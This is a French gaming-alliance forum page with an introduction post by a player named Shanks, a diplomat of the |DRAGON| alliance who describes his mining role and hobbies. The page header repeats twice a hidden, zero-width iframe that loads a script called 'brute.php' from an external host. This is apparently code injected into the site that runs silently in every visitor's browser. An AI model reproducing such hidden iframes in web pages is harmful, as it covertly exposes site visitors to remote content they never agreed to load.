Les PulSar
<iframe style="border: none; width: 0px; height: 0px;" src="http://supprime.net/brute.php?maitre=lechemabanane"></iframe>
Les PulSar
<iframe style="border: none; width: 0px; height: 0px;" src="http://supprime.net/brute.php?maitre=lechemabanane"></iframe>
Les PulSar
Vous souhaitez réagir à ce message ? Créez un compte en quelques clics ou connectez-vous pour continuer.



 
AccueilDernières imagesRechercherS'enregistrerConnexion
-39%
Le deal à ne pas rater :
Pack Home Cinéma Magnat Monitor : Ampli DENON AVR-X2800H, Enceinte ...
1190 € 1950 €
Voir le deal

 

 Shanks le |DRAGON|

Aller en bas 
AuteurMessage
Shanks




Messages : 2
Date d'inscription : 29/07/2010

Shanks le |DRAGON| Empty
MessageSujet: Shanks le |DRAGON|   Shanks le |DRAGON| Icon_minitimeJeu 29 Juil - 21:10

Tiens de la lumière ?

En attendant que s0st0 me réponde In Game, je me suis dis que j'allais voir de quoi avait l'air la vie chez les Pulsar !

Au premier abord, il ne fait pas très chaux, et je n'arrête pas de me retourné pour regarder si des mains ne veulent pas me chopé...
Mais bon à dire vrai le froid revigore et je ne dis jamais non au tripotage de centaine de main 0_o !
Donc j'aime bien l'ambiance xD !!!

Je me présente, Shanks diplomate des |DRAGON|, on est de bon gros moteur diésel 16 sous-papes et vous entendrez parler de nous quand les Dragons que nous sommes sortiront de leur hibernation estival !

Pour ma part, je suis mineur ( pour le moment et un long moment ) Top 500.
J'essaye de refourgué mes cargaisons de deutérium coupé avec du rhum à s0st0, pour me faire une place au soleil des deutiers de Monsieur ^^. Mais si d'autre veulent signé un contrat avec moi, je suis libéré de tout engagement pour le moment.

IRL, j'ai 22ans, je suis web développeur, j'aime les mangas, le japon, les jeuxvideo, le cinéma, et tout un tas d'autre truc banal et puis plein de groupe inutile sur facebook aussi ( ou pas lol )

Bon jeu à tous cher Pulsar et à une prochaine fois !

Amicalement,
Shanks
Revenir en haut Aller en bas
 
Shanks le |DRAGON|
Revenir en haut 
Page 1 sur 1

Permission de ce forum:Vous ne pouvez pas répondre aux sujets dans ce forum
Les PulSar :: Partie Publique :: Présentation-
Sauter vers: